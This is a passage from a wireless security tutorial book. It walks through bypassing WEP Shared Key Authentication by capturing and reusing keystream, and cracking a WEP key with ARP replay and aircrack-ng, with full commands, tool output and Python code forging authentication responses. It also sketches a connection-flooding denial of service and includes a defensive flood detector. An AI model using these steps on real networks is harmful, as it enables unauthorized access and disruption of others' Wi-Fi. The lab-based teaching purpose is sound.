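    return body[8:]  # skip the 6 fixed bytes and the 2-byte IE header


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-protected body: IV (3) + key index (1) + RC4(IV||key) over plaintext||ICV."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    iv, ct = frame[:3], frame[4:]
    pt = rc4(iv + key, ct)
    data, tag = pt[:-4], pt[-4:]
    return data if icv(data) == tag else None


class AccessPoint:
    """Access-point side: issues frame 2 in the clear, checks the encrypted frame 3."""

    def __init__(self, key: bytes):
        self.key = key
        self.pending = None

    def send_challenge(self) -> bytes:
        self.pending = os.urandom(CHALLENGE_LEN)
        return auth_body(2, self.pending)

    def verify_response(self, frame3: bytes) -> bool:
        data = wep_decrypt(self.key, frame3)
        return data is not None and data == auth_body(3, self.pending)


def legitimate_response(key: bytes, frame2: bytes) -> bytes:
    """Frame 3 from a client that really knows the shared key."""
    return wep_encrypt(key, os.urandom(3), auth_body(3, challenge_from_body(frame2)))


def recover_keystream(frame2: bytes, frame3: bytes):
    """Passive observer: frame 3's plaintext is fully known (SEQ 3 plus the challenge from
    frame 2, plus its CRC), so plaintext XOR ciphertext gives the 140-byte keystream for that IV."""
    known = auth_body(3, challenge_from_body(frame2))
    known += icv(known)
    return frame3[:3], bytes(a ^ b for a, b in zip(known, frame3[4:]))


def forged_response(iv: bytes, keystream: bytes, frame2: bytes) -> bytes:
    """Answer a fresh challenge by reusing the captured IV and keystream; no key involved."""
    pt = auth_body(3, challenge_from_body(frame2))
    pt += icv(pt)
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(pt, keystream))


def demo(key: bytes = None) -> dict:
    key = key or os.urandom(5)  # 40-bit WEP secret; the observer never learns it
    ap = AccessPoint(key)
    f2 = ap.send_challenge()
    f3 = legitimate_response(key, f2)
    legit_ok = ap.verify_response(f3)          # the real client gets in
    iv, ks = recover_keystream(f2, f3)         # what a sniffer can compute from f2 and f3
    f2_new = ap.send_challenge()               # a later, different challenge
    forged_ok = ap.verify_response(forged_response(iv, ks, f2_new))
    junk_rejected = not ap.verify_response(forged_response(iv, os.urandom(len(ks)), f2_new))
    return {"legit_ok": legit_ok, "keystream_len": len(ks),
            "forged_ok": forged_ok, "wrong_keystream_rejected": junk_rejected}


if __name__ == "__main__":
    print(demo())
```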


Time for action - bypassing Shared Authentication 
Bypassing Shared Authentication is a bit more challenging than the previous exercises, so follow 
the steps carefully. 


1. Let us first set up Shared Authentication for our Wireless Lab network. I have done 
this on my access point by setting the Security Mode to WEP and Authentication to 
Shared Key: 


[Screenshot of the same DIR-615 WIRELESS SETTINGS page, now with Security Mode: WEP, WEP Key Length: 64 bit (10 hex digits), the four WEP key boxes filled in, Default WEP Key: WEP Key1, and Authentication: Shared Key. The page notes that with WEP the device only operates in legacy 802.11b/g mode.]
2. Let us now connect a legitimate client to this network using the shared key we 
set in step 1. 


3. In order to bypass Shared Key Authentication, we will first start sniffing packets 
between the access point and its clients. However, we would also like to log the 
entire shared authentication exchange. To do this we use airodump-ng with the 
command airodump-ng mon0 -c 11 --bssid 00:21:91:D2:8E:25 -w 
keystream. The -w option, which is new here, requests airodump-ng to store the 
packets in a file whose name is prefixed with the word "keystream". On a side note, 
it might be a good idea to store different sessions of packet captures in different 
files. This allows you to analyze them long after the trace has been collected: 


    CH 11 ][ Elapsed: 2 mins ][ 2011-01-09 11:45

    BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    00:21:91:D2:8E:25  -14  90     1174      4    0  11  54e. WEP  WEP         Wireless Lab

    BSSID              STATION            PWR  Rate  Lost  Packets  Probes





4. We can either wait for a legitimate client to connect to the access point or force 
a reconnect using the Deauthentication technique used previously. Once a client 
connects and the shared key authentication succeeds, airodump-ng will capture 
this exchange automatically by sniffing the air. An indication that the capture has 
succeeded is when the AUTH column reads SKA, that is, Shared Key Authentication, as 
shown next: 


    CH 11 ][ Elapsed: 4 mins ][ 2011-01-09 11:47 ][ 140 bytes keystream: 00:21:91:D2:8E:25

    BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    00:21:91:D2:8E:25  -21  96     2217      7    0  11  54e. WEP  WEP    SKA  Wireless Lab

    BSSID              STATION            PWR  Rate  Lost  Packets  Probes
    00:21:91:D2:8E:25  60:FB:42:D5:E4:01   -3           0        4  Wireless Lab

    root@bt:~#
5. The captured keystream is stored in a file prefixed with the word keystream in 
the current directory. In my case the name of the file is keystream-01-00-21-91-D2-8E-25.xor, 
as shown next: 


[Screenshot of the directory listing:]

    keystream-01-00-21-91-D2-8E-25.xor  keystream-01.cap  keystream-01.csv
    keystream-01.kismet.csv  keystream-01.kismet.netxml





6. In order to fake a shared key authentication, we will use the aireplay-ng 
tool. We run the command aireplay-ng -1 0 -e "Wireless Lab" -y 
keystream-01-00-21-91-D2-8E-25.xor -a 00:21:91:D2:8E:25 -h 
aa:aa:aa:aa:aa:aa mon0. aireplay-ng uses the keystream we retrieved in 
step 5 and tries to authenticate with the access point with SSID Wireless Lab 
and MAC address 00:21:91:D2:8E:25, using an arbitrary client MAC address 
aa:aa:aa:aa:aa:aa. Fire up Wireshark and sniff all packets of interest by applying 
the filter wlan.addr == aa:aa:aa:aa:aa:aa: 


    root@bt:~# aireplay-ng -1 0 -e "Wireless Lab" -y keystream-01-00-21-91-D2-8E-25.xor -a 00:21:91:D2:8E:25 -h aa:aa:aa:aa:aa:aa mon0





7. aireplay-ng lets us know if the authentication succeeded or not in the output: 


    root@bt:~# aireplay-ng -1 0 -e "Wireless Lab" -y keystream-01-00-21-91-D2-8E-25.xor -a 00:21:91:D2:8E:25 -h aa:aa:aa:aa:aa:aa mon0
    The interface MAC (00:C0:CA:3E:BD:93) doesn't match the specified MAC (-h).
            ifconfig mon0 hw ether AA:AA:AA:AA:AA:AA
    ..:..:51  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
    ..:..:52  [ACK]
    ..:..:52  Authentication 2/2 successful
    ..:..:52  Sending Association Request [ACK]
    ..:..:53  Association successful :-) (AID: 1)

[The left edge of the screenshot, with the hour and minute of each timestamp and the first authentication messages, is cut off.]
8. We can verify the same using Wireshark. You should see a trace as shown next on 
the Wireshark screen: 


[Wireshark screenshot with the filter wlan.addr == aa:aa:aa:aa:aa:aa applied. The packet list shows the Authentication frames between aa:aa:aa:aa:aa:aa and D-Link_d2:8e:25 (SN=0 from the client, SN=2950 from the access point, retransmitted several times), followed by the Association Request and Response. Frame 611, the Association Request, is expanded:]

    Frame 611 (70 bytes on wire, 70 bytes captured)
    Radiotap Header v0, Length 12
    IEEE 802.11 Association Request, Flags: ........
    IEEE 802.11 wireless LAN management frame
        Fixed parameters (4 bytes)
            Capability Information: 0x0431
            Listen Interval: 0x0064
        Tagged parameters (30 bytes)
            SSID parameter set: "Wireless Lab"
                Tag Number: 0 (SSID parameter set)





9. The first packet is the authentication request sent by the aireplay-ng tool to the 
access point: 


[Wireshark screenshot, same filter, with frame 559 expanded:]

    559  28.476433  aa:aa:aa:aa:aa:aa  D-Link_d2:8e:25    IEEE 802  Authentication, SN=0, FN=0
    561  28.485326  D-Link_d2:8e:25    aa:aa:aa:aa:aa:aa  IEEE 802  Authentication, SN=2950, FN=0

    Frame 559 (42 bytes on wire, 42 bytes captured)
    Radiotap Header v0, Length 12
    IEEE 802.11 Authentication, Flags: ........
    IEEE 802.11 wireless LAN management frame
        Fixed parameters (6 bytes)
            Authentication Algorithm: Shared key (1)
            Authentication SEQ: 0x0001
            Status code: Successful (0x0000)

    0000  00 00 0c 00 04 80 00 00 02 00 18 00 b0 00 3a 01
    0010  00 21 91 d2 8e 25 aa aa aa aa aa aa 00 21 91 d2
    0020  8e 25 00 00 01 00 01 00 00 00





10. The second packet consists of the access point sending the client a challenge text 
as shown: 


[Wireshark screenshot, same filter, with frame 561 expanded:]

    559  28.476433  aa:aa:aa:aa:aa:aa  D-Link_d2:8e:25    IEEE 802  Authentication, SN=0, FN=0
    561  28.485326  D-Link_d2:8e:25    aa:aa:aa:aa:aa:aa  IEEE 802  Authentication, SN=2950, FN=0

    Frame 561 (196 bytes on wire, 196 bytes captured)
    Radiotap Header v0, Length 32
    IEEE 802.11 Authentication, Flags: ........C
    IEEE 802.11 wireless LAN management frame
        Fixed parameters (6 bytes)
            Authentication Algorithm: Shared key (1)
            Authentication SEQ: 0x0002
            Status code: Successful (0x0000)
        Tagged parameters (130 bytes)
            Challenge text
                Tag Number: 16 (Challenge text)
                Tag Length: 128
                Tag interpretation: Challenge text: F4E5EEB4... (128 bytes, truncated in the screenshot)
11. In the third packet, the tool sends the encrypted challenge to the access point: 


[Wireshark screenshot, same filter, with frame 589 expanded:]

    589  28.833090  aa:aa:aa:aa:aa:aa  D-Link_d2:8e:25    IEEE 802  Authentication, SN=3, FN=0, Flags=.p......
    591  28.839319  D-Link_d2:8e:25    aa:aa:aa:aa:aa:aa  IEEE 802  Authentication, SN=2955, FN=0

    Frame 589 (181 bytes on wire, 181 bytes captured)
    Radiotap Header v0, Length 13
    IEEE 802.11 Authentication, Flags: .p......
    Data (136 bytes)
        Data: 5A4542F14ACAA021BC046E2B7DE58962B476444720A4FD7BD...

[The "p" flag marks the frame as protected: the 136-byte body is the WEP-encrypted challenge, which Wireshark cannot decode without the key.]





12. As aireplay-ng used the derived keystream for encryption, the authentication 
succeeds and the access point sends a success message in the fourth packet: 


[Wireshark screenshot, same filter, with frame 591 expanded:]

    591  28.839319  D-Link_d2:8e:25  aa:aa:aa:aa:aa:aa  IEEE 802  Authentication, SN=2955, FN=0

    Frame 591 (66 bytes on wire, 66 bytes captured)
    Radiotap Header v0, Length 32
    IEEE 802.11 Authentication, Flags: ........C
    IEEE 802.11 wireless LAN management frame
        Fixed parameters (6 bytes)
            Authentication Algorithm: Shared key (1)
            Authentication SEQ: 0x0004
            Status code: Successful (0x0000)
13. After authentication succeeds, the tool fakes an association with the access point, 
which succeeds as well: 


[Wireshark screenshot, filter wlan.addr == aa:aa:aa:aa:aa:aa: after the Authentication frames (604, 605), frame 611 is an IEEE 802.11 Association Request from aa:aa:aa:aa:aa:aa to D-Link_d2:8e:25 (SN=6, FN=0) and frame 613 the Association Response from D-Link_d2:8e:25 (SN=2958, FN=0). Frame 611 (70 bytes on wire), IEEE 802.11 wireless LAN management frame: fixed parameters (4 bytes): Capability Information: 0x0431, Listen Interval: 0x0064; tagged parameters (30 bytes): SSID parameter set "Wireless Lab" (Tag Number 0, Tag length 12), Supported Rates: 1.0 2.0 5.5 11.0 (Tag Number 1, Tag length 4).]





14. If you check the wireless logs in your access point's administrative interface, you should now see a wireless client with MAC address AA:AA:AA:AA:AA:AA connected:


[Screenshot: D-Link DIR-615 (Hardware Version B2, Firmware Version 2.23) administrative interface, STATUS > WIRELESS page, which lists the wireless clients currently connected to the router: NUMBER OF WIRELESS CLIENTS: 1; the single row shows a rate of 54 and a signal of 100%.]
What just happened?

We were successful in deriving the keystream from a shared authentication exchange, and we used it to fake an authentication to the access point.














Access points have a maximum client count, after which they start refusing connections. By writing a simple wrapper over aireplay-ng, it is possible to automate sending hundreds of connection requests from random MAC addresses to the access point. This would end up filling its internal tables, and once the maximum client count is reached, the access point would stop accepting new connections. This is typically what is called a Denial of Service (DoS) attack; it can force the router to reboot or make it dysfunctional, which could lead to all the wireless clients being disconnected and unable to use the authorized network.


Check if you can verify this in your lab! 
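One way to spot the flood described above from the defender's side, as an added Python example (not code from the book or from the aircrack-ng project): it consumes a constructed list of management-frame records, as a monitor-mode sensor or a wireless IDS would log them, counts the distinct MAC addresses that send Authentication frames in each ten-second window, and flags windows in which that count exceeds a threshold, also reporting how many of those addresses never went on to associate. The window size, the threshold and the sample MAC addresses are assumptions made for the example.

```python
from collections import defaultdict

# Detection parameters (assumed; tune to the access point's real client capacity)
WINDOW_SECONDS = 10      # width of each counting window
MAX_NEW_CLIENTS = 20     # distinct authenticating MACs per window before alerting

# Constructed sample of 802.11 management frames seen by a monitor-mode sensor:
# (timestamp in seconds, source MAC, frame subtype). The first entries are two
# ordinary clients that authenticate and then associate; the rest is a burst of
# 30 Authentication requests from random MACs that never associate, which is the
# pattern a flood of fake connection requests produces.
SAMPLE_FRAMES = [
    (1.0, "60:fb:42:d5:e4:01", "auth"),
    (1.2, "60:fb:42:d5:e4:01", "assoc"),
    (3.0, "00:00:5e:00:53:01", "auth"),     # IANA documentation MAC, constructed
    (3.3, "00:00:5e:00:53:01", "assoc"),
] + [(100.0 + i * 0.1, f"02:00:00:00:00:{i:02x}", "auth") for i in range(30)]


def detect_auth_floods(frames, window=WINDOW_SECONDS, threshold=MAX_NEW_CLIENTS):
    """Count the distinct MAC addresses that send Authentication frames in each
    fixed window and report the windows that exceed the threshold. Each alert
    also says how many of those MACs never sent an Association Request: flood
    sources fill the access point's client table but never complete a connection."""
    auth_by_window = defaultdict(set)
    associated = set()
    for timestamp, mac, subtype in frames:
        if subtype == "auth":
            auth_by_window[int(timestamp // window)].add(mac)
        elif subtype == "assoc":
            associated.add(mac)

    alerts = []
    for bucket, macs in sorted(auth_by_window.items()):
        if len(macs) > threshold:
            alerts.append({
                "window_start": bucket * window,
                "distinct_macs": len(macs),
                "never_associated": len(macs - associated),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_auth_floods(SAMPLE_FRAMES):
        print(f"auth flood at t={alert['window_start']}s: "
              f"{alert['distinct_macs']} distinct MACs, "
              f"{alert['never_associated']} never associated")
```

The two ordinary clients fall well under the threshold, while the burst at t=100 s produces one alert with 30 distinct addresses, none of which associated; the "never associated" count is what separates a genuine crowd of new clients from a table-filling flood.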


1. You can force a wireless client to re-connect to the access point by?
   a. Sending a Deauthentication packet
   b. Rebooting the client
   c. Rebooting the access point
   d. All of the above

2. Open Authentication:
   a. Provides decent security
   b. No security
   c. Requires use of encryption
   d. None of the above

3. Breaking Shared Key Authentication works by?
   a. Deriving the keystream from the packets
   b. Deriving the encryption key
   c. Sending Deauthentication packets to the access point
   d. Rebooting the access point


Summary

In this chapter, we have learnt the following about WLAN authentication:

* Hidden SSIDs are a security-through-obscurity feature, which is relatively simple to beat.
* MAC address filters do not provide any security, as MAC addresses can be sniffed from the air from the wireless packets. This is possible because the MAC addresses are unencrypted in the packet.
* Open Authentication provides no real authentication at all.
* Shared Key Authentication is a bit tricky to beat, but with the help of the right tools we can derive and store the keystream, using which it is possible to answer all future challenges sent by the access point. The result is that we can authenticate without needing to know the actual key.

In the next chapter, we will look at different WLAN encryption mechanisms, WEP, WPA, and WPA2, and look at the insecurities which plague them.


WLAN Encryption Flaws


"640 K is more memory than anyone will ever need." 
Bill Gates, Founder, Microsoft

Even with the best of intentions, the future is always unpredictable. The WLAN committee designed WEP and then WPA to be foolproof encryption mechanisms, but over time both these mechanisms had flaws, which have been widely publicized and exploited in the real world.

WLAN encryption mechanisms have had a long history of being vulnerable to cryptographic attacks. It started with WEP in early 2000, which eventually was broken entirely. In recent times, attacks are slowly targeting WPA. Even though there is no public attack available currently to break WPA in all general conditions, there are attacks which are feasible under special circumstances.


In this chapter, we shall look at the following:

* Different encryption schemas in WLANs
* Cracking WEP encryption
* Cracking WPA encryption


WLAN encryption

* Wired Equivalent Privacy (WEP)
* Wi-Fi Protected Access (WPA)
* Wi-Fi Protected Access v2 (WPAv2)




Here, we will look at each of these encryption protocols and demonstrate various attacks 
against them. 


WEP encryption

The WEP protocol was known to be flawed as early as 2000, but surprisingly it is still in use, and access points still ship with WEP enabled as an option.

There are many cryptographic weaknesses in WEP, discovered by Walker, Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluation of WEP from a cryptographic standpoint is beyond the scope of this book, as it involves understanding complex math.






Let us now first set up WEP in our test lab and see how we can break it. 





Time for action - cracking WEP 


Follow the given instructions to get started: 


1. Let us first connect to our access point Wireless Lab and go to the settings area that deals with wireless encryption mechanisms:


[Screenshot: D-Link DIR-615 (Hardware Version B2, Firmware Version 2.23) SETUP > WIRELESS SETTINGS page. WIRELESS NETWORK SETTINGS: Enable Wireless: Always; Wireless Network Name: Wireless Lab (Also called the SSID); 802.11 Mode: Mixed 802.11n, 802.11g and 802.11b; Wireless Channel: 2.462 GHz - CH 11; Transmission Rate: Best (automatic) (Mbit/s); Channel Width: 20 MHz. WIRELESS SECURITY MODE: Security Mode: None. The page's help text reads: "To protect your privacy you can configure wireless security features. This device supports three wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not require an authentication server. The WPA-Enterprise option requires an external RADIUS server."]
2. On my access point, this can be done by setting the Security Mode to WEP. We will also need to set the WEP key length.


[Screenshot: the same WIRELESS SETTINGS page with the WIRELESS SECURITY MODE section now set to WEP. The router's help text for WEP reads:]

WEP is the wireless encryption standard. To use it you must enter the same key(s) into the router and the wireless stations. For 64 bit keys you must enter 10 hex digits into each key box. For 128 bit keys you must enter 26 hex digits into each key box. A hex digit is either a number from 0 to 9 or a letter from A to F. For the most secure use of WEP set the authentication type to "Shared Key" when WEP is enabled.

You may also enter any text string into a WEP key box, in which case it will be converted into a hexadecimal key using the ASCII values of the characters. A maximum of 5 text characters can be entered for 64 bit keys, and a maximum of 13 characters for 128 bit keys.

If you choose the WEP security option this device will ONLY operate in Legacy Wireless mode (802.11B/G). This means you will NOT get 11N performance due to the fact that WEP is not supported by Draft 11N specification.

[Settings shown: WEP Key Length: 128 bit (26 hex digits) (length applies to all keys); WEP Key 1 to WEP Key 4 filled in (masked); Default WEP Key: WEP Key 1; Authentication: Shared Key.]





3. Once the settings are applied, the access point should now be offering WEP as the 
encryption mechanism of choice. Let us now set up the attacker machine. 




4. Let us bring up wlan0 by issuing the command ifconfig wlan0 up. Then we will run airmon-ng start wlan0 to create mon0, the monitor mode interface, as shown in the following screenshot. Verify that the mon0 interface has been created using the iwconfig command:


root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

root@bt:~# iwconfig
          no wireless extensions.

          no wireless extensions.

          no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0





5. Let's run airodump-ng to locate our lab access point using the command airodump-ng mon0. As you can see in the following screenshot, we are able to see the Wireless Lab access point running WEP:
[airodump-ng mon0 output; the BSSID, Beacons and #Data columns are unreadable in the screenshot:]

 CH  1 ][ Elapsed: 4 s ][ 2011-02-06 03:21

 PWR   CIPHER  AUTH  ESSID
 -14   WEP           Wireless Lab
 -40                 <length:  0>
 -40                 <length:  0>
 -34   TKIP    PSK   Vivek
 -43                 <length:  0>
 -66   TKIP    PSK   shrooti
 -66   TKIP    PSK   Sunny

 BSSID              STATION            Rate    Lost  Packets  Probes
 00:25:5E:17:41:..  00:22:FB:35:FC:44  24 - 5     0
root@bt:~#





6. For this exercise, we are only interested in the Wireless Lab network, so let us enter airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WEPCrackingDemo mon0 to only see packets for this network. Additionally, we will request airodump-ng to save the packets into a pcap file using the --write directive:






root@bt:~# airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WEPCrackingDemo mon0

 CH 11 ][ Elapsed: 0 s ][ 2011-02-06 03:31

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25  -19  83       27        0    0  11  54.  WEP  WEP         Wireless Lab

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
7. Now let us connect our wireless client to the access point and use the WEP key abcdefabcdefabcdefabcdef12. Once the client has successfully connected, airodump-ng should report it on the screen:


 CH 11 ][ Elapsed: 8 mins ][ 2011-02-06 03:38 ][ 140 bytes keystream: 00:21:91:D2:8E:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25  -18 100     4399       61    0  11  54e. WEP  WEP    SKA  Wireless Lab

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:21:91:D2:8E:25  60:FB:42:D5:E4:01   -9    0 -54e     0       41  Wireless Lab





8. If you do an ls in the same directory, you will be able to see files prefixed with WEPCrackingDemo-* as shown in the following screenshot. These are traffic-dump files created by airodump-ng:


root@bt:~# ls
WEPCrackingDemo-01-00-21-91-D2-8E-25.xor  WEPCrackingDemo-01.kismet.csv     install.sh
WEPCrackingDemo-01.cap                    WEPCrackingDemo-01.kismet.netxml
WEPCrackingDemo-01.csv                    cdrom
root@bt:~#





9. If you look at the airodump-ng screen, the number of data packets listed under the #Data column is very small (only 68).

number of data packets, encrypted with the same key to exploit weaknesses in the protocol.





 CH 11 ][ Elapsed: 13 mins ][ 2011-02-06 03:44 ][ 140 bytes keystream: 00:21:91:D2:8E:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25   -7  84     7562       68    0  11  54e. WEP  WEP    SKA  Wireless Lab

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:21:91:D2:8E:25  60:FB:42:D5:E4:01  -14    0 - 1e     0       45  Wireless Lab
10. We will capture ARP packets on the wireless network using aireplay-ng and inject them back into the network, to simulate ARP responses. We will be starting aireplay-ng in a separate window, as shown in the next screenshot. Replaying these packets a few thousand times, we will generate a lot of data traffic on the network. Even though aireplay-ng does not know the WEP key, it is able to identify the ARP packets by looking at the size of the packets. ARP is a fixed-header protocol, and thus the size of an ARP packet can be easily determined and used to identify them even within encrypted traffic. We will run aireplay-ng with the options that are discussed next. The -3 option is for ARP replay, -b specifies the BSSID of our network, and -h specifies the client MAC address that we are spoofing. We need to do this, as the replay attack will only work for authenticated and associated client MAC addresses.





root@bt:~# aireplay-ng -3 -b 00:21:91:D2:8e:25 -h 60:fb:42:d5:e4:01 mon0





11. Very soon you should see that aireplay-ng was able to sniff ARP packets and has started replaying them into the network:

root@bt:~# aireplay-ng -3 -b 00:21:91:D2:8e:25 -h 60:fb:42:d5:e4:01 mon0
The interface MAC (00:C0:CA:3E:BD:93) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 60:FB:42:D5:E4:01
03:59:25  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
Saving ARP requests in replay_arp-0206-035925.cap
You should also start airodump-ng to capture replies.
Read 6043 packets (got 1886 ARP requests and 1869 ACKs), sent 1963 packets...(500 pps)

















12. At this point, airodump-ng will also start registering a lot of data packets. All these sniffed packets are being stored in the WEPCrackingDemo-* files that we saw previously:

 CH 11 ][ Elapsed: 30 mins ][ 2011-02-06 04:01 ][ 140 bytes keystream: 00:21:91:D2:8E:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25   -6 100    16387    11190    0  11  54e. WEP  WEP    SKA  Wireless Lab

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:21:91:D2:8E:25  60:FB:42:D5:E4:01    0    0        0    22026  Wireless Lab
13. Now, let us start with the actual cracking part! We fire up aircrack-ng with the option WEPCrackingDemo-01.cap in a new window. This will start the aircrack-ng software and it will begin working on cracking the WEP key using the data packets in the file. Note that it is a good idea to have airodump-ng collecting the WEP packets, aireplay-ng doing the replay attack, and aircrack-ng attempting to crack the WEP key based on the captured packets,

root@bt:~# aircrack-ng WEPCrackingDemo-01.cap
Opening WEPCrackingDemo-01.cap
Read 189695 packets.

   #  BSSID              ESSID                     Encryption

   1  00:21:91:D2:8E:25  Wireless Lab              WEP (11196 IVs)

Choosing first network as target.

Opening WEPCrackingDemo-01.cap
Reading packets, please wait...




14. Your screen should look like the following screenshot when aircrack-ng is working on the packets to crack the WEP key:

                               Aircrack-ng 1.0 r1645

                 [00:00:04] Tested 331777 keys (got 11111 IVs)

   KB    byte(vote)                            (depth column unreadable in the screenshot)
    0    AB(17664) 1D(16640) 5A(15360) BA(15360) D1(15104) 07(14848) E8(14848) F0(14848)
    1    DD(17664) 78(16384) B0(16384) 25(15104) 48(14848) 36(14592) 79(14336) 0F(14080)
    2    92(15872) 84(15616) 1A(15360) 38(15104) 14(14848) 29(14848) A1(14592) C1(14592)
    3    7C(16896) FF(16384) 7A(16128) 12(15360) 47(15360) B7(15360) 85(15104) 94(15104)
    4    0B(15872) CB(15616) 0F(15104) B1(15104) A9(14848) C4(14848) 2A(14592) 36(14592)
    5    46(14848) 47(14592) 5C(14592) 9A(14336) 30(14080) 46(14080) 4C(14080) 6A(14080)
    6    2B(15104) 44(14592) A4(14592) EC(14592) 24(14080) 2B(14080) 3B(14080) 6D(14080)
    7    56(15872) 0C(14848) 21(14848) 5C(14848) D8(14848) F9(14848) 2C(14336) 40(14336)
    8    02(14848) D4(14592) E4(14592) 11(14336) 13(14336) 70(14336) BC(14336) 46(14080)
    9    B3(16384) 5E(15872) D4(15872) 4C(15104) EB(14848) 6F(14592) BC(14592) E0(14592)
   10    5B(15616) 03(14592) 24(14592) 5F(14592) 68(14592) E0(14592) 5E(14336) 95(14336)
   11    C8(15616) A6(15360) 39(15104) D7(14848) 95(14592) BD(14592) 46(14336) 0B(14080)
   12    6B(15104) 15(14848) 57(14848) 70(14592) CE(14592) 0A(14336) 6F(14336) CA(14336)
15. The number of data packets required to crack the key is non-deterministic, but generally in the order of a hundred thousand or more. On a fast network (or using aireplay-ng), this should take 5-10 minutes at most. If the number of data packets currently in the file is not sufficient, then aircrack-ng will pause as shown in the following screenshot and wait for more packets to be captured, and will then restart the cracking process:

                               Aircrack-ng 1.0 r1645

                 [00:01:49] Tested 144029 keys (got 11199 IVs)

   KB    depth   byte(vote)
    0    9/ 10   CA(14592) 15(14080) 32(14080) 7D(14080) 6C(13824) 90(13824) E5(13824) 3D(13568)
    1    9/ 14   FA(14336) 5A(14080) 61(14080) 6B(14080) BC(14080) C1(14080) C7(14080) F1(14080)
    2   18/  2   D4(13824) 26(13568) 5F(13568) A5(13568) FE(13568) 19(13312) 1D(13312) 22(13312)
    3   17/ 18   FE(14080) 60(13824) 8C(13824) DD(13824) F6(13824) 10(13568) 39(13568) A6(13568)
    4   25/  4   FC(13824) 60(13568) 68(13568) 1E(13312) 5D(13312) 62(13312) 80(13312) 9E(13312)

Failed. Next try with 15000 IVs.

[Second screenshot, after more packets were collected; the depth column is unreadable:]

                               Aircrack-ng 1.0 r1645

                 [00:25:36] Tested 1285089 keys (got 48988 IVs)

   KB    byte(vote)
    0    AB(75520) 4D(56576) 90(56320) 3A(56064) 2B(55552) B7(55552) BA(55552) CB(55552)
    1    CD(72704) 6C(60160) 7A(59904) A0(57088) D6(56832) BC(56576) C5(56576) 1E(56320)
    2    EF(69888) ED(58368) EE(57600) AF(57344) 9A(56832) 51(56320) A3(56320) C5(56320)
    3    AB(64512) 47(60416) B9(60416) 5E(59392) A1(57856) 82(57600) E1(57088) E7(56576)
    4    CD(65024) 7D(59904) 43(58624) F9(58112) 03(57088) EE(56576) 41(56320) 28(55552)
    5    51(58112) 6D(57856) 72(57344) CE(57088) 44(56320) 5C(55808) 9E(55552) 05(55040)
    6    AB(67584) A4(58624) 6D(58112) FB(57856) 16(57344) A2(57088) 24(56832) 91(56832)
    7    CD(65024) 8B(58112) 40(57856) D5(57856) 81(57344) D6(57344) DA(57088) 8E(55808)
    8    EF(67072) F7(58880) 66(58624) A8(57856) 5D(57344) A0(57344) 11(57088) CC(56832)
    9    AB(59904) 86(57856) 41(57344) 94(57344) 0A(56576) 08(56320) 25(56064) A9(56064)
   10    2C(58112) E0(57600) FB(57344) 47(56576) 9D(56576) C4(56576) 17(55552) 21(55552)
   11    A8(57856) 48(57600) 9F(57600) 34(56832) AF(56320) D7(56320) 8D(56064) 22(55808)
   12    12(57308) CE(55844) A4(55076) 1B(54892) 68(54784) C0(54784) 66(54748) 4F(54564)

                   KEY FOUND! [ AB:CD:EF:AB:CD:EF:AB:CD:EF:AB:CD:EF:12 ]
        Decrypted correctly: 100%

root@bt:~#
What just happened?

We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we first waited for a legitimate client of the network to connect to the access point. After this, we used the aireplay-ng tool to replay ARP packets into the network. This caused the network to send ARP reply packets, thus greatly increasing the number of data packets sent over the air. We then used aircrack-ng to crack the WEP key by analyzing cryptographic weaknesses in these data packets.
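The "cryptographic weaknesses" referred to above come from WEP's construction: every frame is encrypted with RC4 keyed by a 24-bit IV, sent in the clear, concatenated with the secret key. The following Python script is an added example and not code from the book or from the aircrack-ng project. It implements RC4 and the WEP per-packet keying with a 128-bit key, shows that two frames carrying the same IV leak the XOR of their plaintexts without any knowledge of the key (the same keystream-reuse property that made the shared-key authentication bypass of the previous chapter possible), and computes the birthday-bound probability of an IV repeat after a given number of frames. The CRC-32 ICV is left out, the key used in the demo is the lab key from this chapter, and the IV and payloads are constructed.

```python
import math

IV_BITS = 24                    # WEP sends a 24-bit IV in the clear with every frame
IV_SPACE = 1 << IV_BITS


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling + keystream generation), XORed over data."""
    s = list(range(256))
    j = 0
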